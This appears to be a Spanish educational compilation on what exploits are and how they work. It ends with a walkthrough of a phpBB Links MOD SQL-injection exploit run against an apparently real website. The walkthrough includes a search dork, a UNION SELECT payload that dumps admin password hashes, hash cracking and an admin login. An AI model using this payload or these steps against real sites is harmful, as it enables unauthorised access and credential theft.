Você está na página 1de 5

Que es un Exploit

Exploit (del ingls to exploit, explotar o aprovechar) es una pieza de software, fragmento de
datos o secuencia de comandos y/o acciones, utilizada con el fin de aprovechar una vulnerabilidad
de seguridad de un sistema de informacin para conseguir un comportamiento no deseado del
mismo. Ejemplos de comportamiento errneo: Acceso de forma no autorizada, toma de control de
un sistema de cmputo, consecucin privilegios no concedidos lcitamente, consecucin de
ataques de denegacin de servicio. Hay que observar que el trmino no se circunscribe a piezas de
software, por ejemplo cuando lanzamos un ataque de ingeniera social, el ardit o discurso que
preparamos para convencer a la vctima tambin se considera un exploit.1
Lo exploits pueden tomar forma en distintos tipos de software, como por ejemplo scripts, virus
informticos o gusanos informticos,


Segn la forma en la que el exploit contacta con el software vulnerable:2
Exploit remoto.- Si utiliza una red de comunicaciones para entrar en contacto con el sistema
vctima. Por ejemplo puede usar otro equipo dentro de la misma red interna o tener acceso desde
la propia Internet.
'Exploit local.- Si para ejecutar el exploit se necesita tener antes acceso a el sistema vulnerable. Por
ejemplo el exploit puede aumentar los privilegios del que lo ejecuta. Este tipo de exploits tambin
puede ser utilizado por un atacante remoto que ya tiene acceso a la mquina local mediante un
exploit remoto.
Exploit ClientSide.1 - Aprovechan vulnerabilidades de aplicaciones que tpicamente estn
instaladas en gran parte de las estaciones de trabajo de las organizaciones. Ejemplos tpicos de
este tipo de software son aplicaciones ofimticas (Ej. Microsoft Office, Open Office), lectores de
PDF (Ej. Adobe Acrobat Reader), navegadores (Ej. Internet Explorer, Firefox, Chrome, Safari),
reproductores multimedia (Ej. Windows Media Player, Winamp, iTunes). El exploit est dentro de
ficheros interpretados por este tipo de aplicaciones y que llega a la mquina objetivo por distintos
medios (Ej email o pendrive). El archivo ser usado por el programa y si no es detenido por ningn
otro programa (Ej. firewall o antivirus) aprovechar la vulnerabilidad de seguridad. Las
peculiaridades de este tipo de ataques son:
Requieren la intervencin del usuario del lado del cliente. Por ejemplo necesitan que abra cierto
archivo o que haga click en cierto link
Es un ataque asincrnico porque el momento en que se lanza no es el mismo en que se consigue
ejecutar el exploit (ya que necesita la accin del usuario).
Se lanza a ciegas, no se sabe qu aplicaciones y versiones de esta utiliza el objetivo real.
Segn el propsito de su ataque:2
Curiosidad
Fama personal
Beneficio personal
Espionaje
Frameworks de exploits[editar editar fuente]

Los frameworks de exploits son paquetes software de apoyo que contienen mdulos que ayudan
para la construccin de exploits.3 1 Estos frameworks permiten la reutilizacin del cdigo, la
estandarizacin de los exploits y la simplificacin del proceso de ataques.
que hace un exploit
Exploit (del ingls to exploit, explotar, aprovechar) es el nombre con el que se identifica un
programa informtico malicioso, o parte del programa, que trata de forzar alguna deficiencia o
vulnerabilidad de otro programa.
El fin puede ser la destruccin o inhabilitacin del sistema atacado, aunque normalmente se trata
de violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y
emplearlo en beneficio propio o como origen de otros ataques a terceros.
Los xploits se pueden caracterizar segn las categoras de vulnerabilidades utilizadas:
Vulnerabilidades de desbordamiento de buffer
Vulnerabilidades de condicin de carrera
Vulnerabilidades de error de formato de cadena
Vulnerabilidades de Cross Site Scripting XSS
Vulnerabilidades de Inyeccin SQL
Vulnerabilidades de Inyeccin de Caracteres CRLF
Vulnerabilidades de denegacin del servicio
Vulnerabilidades Inyeccin mltiple HTML Multiple HTML Injection
Vulnerabilidades de ventanas engaosas o mistificacin de ventanasWindow Spoofing
Como funciona un exploit
Quienes no saben lo que son los exploits les sugiero que lean detenidamente este artculo porque
son justamente estas herramientas las que utilizan los crackers para infiltrarse en sistemas
desprotegidos o descuidados, los cuales muchas veces permiten accesos de root o Administrador
en la mquina afectada. Vamos por paso, en primer lugar que es un exploit?. Son pequeos
trozos de cdigo (en cualquier lenguaje) que estn escritos para aprovecharse de vulnerabilidades
y/o errores especficos dentro de un sistema... para lograr acceder a l de forma ilegtima o causar
otro tipo de problemas. Hay que tener en cuenta siempre que TODOS los software del mundo son
desarrollados por humanos, por lo tanto es normal encontrarse con errores en los cdigos. Estos
errores, comnmente llamados bugs, pueden ser del tipo desbordamiento de bfer (buffer
overflow), condicin de carrera (race condition), errores de validacin de variables, etc, etc.

Por ejemplo si se encontr un error en un software de correo el cual al enviar un telnet al servidor y
ejecutar una serie de instrucciones, satura el bfer del software de correos y provoca una
denegacin de servicio (DoS). Entonces un hacker escribir un cdigo que sirva para explotar (de
ah el nombre "exploit) esta vulnerabilidad y con un par de instrucciones ms quiz sea posible
abrir un acceso remoto con permisos de root en el servidor afectado.

Podramos catalogar a los exploits en dos tipos diferentes:

1.- 0-day
2.- Pblicos

Los exploits de tipo 0-day son aquellos que los hackers mantienen ocultos al mundo y los utilizan
para explotar los sistemas que quieren. De alguna manera son trozos de cdigo privados.
Por otro lado los exploits pblicos son aquellos que los hackers decidieron no utilizar ms en su
propio beneficio y los liberan pblicamente a algunos de los sitios webs ms conocidos como
www.milw0rm.com, www.securityfocus.com, www.packetstormsecurity.org, etc. Muchas veces
pueden pasar varios meses o aos entre que el exploit pase de condicin 0-day a ser pblico. Es
por esto mismo que los primeros son ms peligrosos, ya que al no conocerse la vulnerabilidad y no
ser pblica entonces existen muchos ms servidores afectados cuyos administradores ni siquiera
se enteran de que pueden ser atacados. Al hacerse pblicos, normalmente se entrega la solucin o
bien los fabricantes de software reaccionan y sacan una actualizacin de seguridad crtica.

Esta es la razn por la cual hay que siempre tener dos cosas presentes:

1.- El tipo de software y la versin exacta que tenemos instalado en nuestras mquinas, ya sea
como cliente (ejemplo Microsoft Outlook) o servidor (Exchange, Postfix, Sendmail, etc)

2.- Nunca dejar de revisar los sitios de exploits mencionados anteriormente. Increblemente hay
gente que se dedica a estar atentos a estos exploits para inmediatamente cuando se publica
comenzar a atacar sitios webs. Estos son los llamados script-kiddies. Pero por ms despectivo que
parezca el nombre, son igualmente peligrosos.

Debido a eso es que en la columna izquierda de este sitio web aparecen las ltimas
vulnerabilidades y exploits encontrados que han sido publicadas.

Ejemplo de un exploit:

Hace un par de das (31 de Agosto) atrs sali en www.milw0rm.com el siguiente exploit:

phpBB Links MOD 1.2.2 Remote SQL Injection Exploit

El texto es bastante claro. El mdulo "Links" del sistema de foros llamado phpBB en su versin
1.2.2 es vulnerable a inyeccin SQL remota. Estos significa que mediante la URL es posible
interactuar directamente con la base de datos (en este caso MySQL) para, entre otras cosas,
obtener la password de Administrador y poder loguearse como tal.
Para ver el exploit haga click aqu.

Este exploit no es muy largo (ya dijimos que son pequeos trozos de cdigo escritos para una
vulnerabilidad especfica) y est escrito en lenguaje PERL. Por lo tanto para ejecutarlo habr que
tener PERL instalado en nuestras mquinas. Los sistemas Linux/UNIX vienen con PERL.

Lo que se hace es copiar el cdigo y guardarlo en un archivo con extensin .pl (de PERL).

h4x0r@tarro:~/Desktop/exploit$ ls -lh
total 4,0K
-rw-r--r-- 1 h4x0r h4x0r 1,5K 2007-09-03 11:53 phpBB2.pl
h4x0r@tarro:~/Desktop/exploit$

y simplemente ejecutarlo. En este caso nos ir pidiendo los datos del sitio web que queremos
atacar. Pondr en rojo esto para diferenciarlo.

h4x0r@tarro:~/Desktop/exploit$ perl phpBB2.pl

phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit

Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=
asd&start=1,1%20UNION%20SELECT%201,
username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20
phpbb_users%20WHERE%20user_id=2/*

=> Insert URL
=> without ( http )
=>

ww.motoqueros.cl

=> Insert directory
=> es: /forum/ - /phpBB2/
=>

/foros/

=> User ID
=> Number:
=>

1

Exploit in process...
Exploit
in process...
Exploit finished!
MD5-Hash is: 827ccb0eea8a706c4c34a16891f84e7b

Y eso sera todo. El exploit fue capaz de conectarse a la base de datos y recuperar el password
cifrado del usuario con ID 1 (admin en este caso). Esta cadena de 32 caracteres corresponde a un
hash en md5. De mucho no nos sirve tener la clave cifrada, pero podemos recuperarla atacndola
con fuerza bruta (o diccionario) en los siguientes sitios web:
http://md5.xpzone.de/
http://gdataonline.com/seekhash.php
Ponemos el hash y comprobamos la la clave de admin es 12345. Ahora podemos loguearnos en
http://www.sitioweb.com/foros/ usando estos datos.

Existen exploits mucho ms elaborados y poderosos, pero esto fue un ejemplo para mostrar cuan
simple puede ser recuperar una contrasea o acceder ilegtimamente a un servidor cuando se le
aplican los exploits correctos.


http://www.seguridad-informatica.cl/

http://es.wikipedia.org/wiki/Exploit
http://www.seguridadpc.net/exploit.htm

Você também pode gostar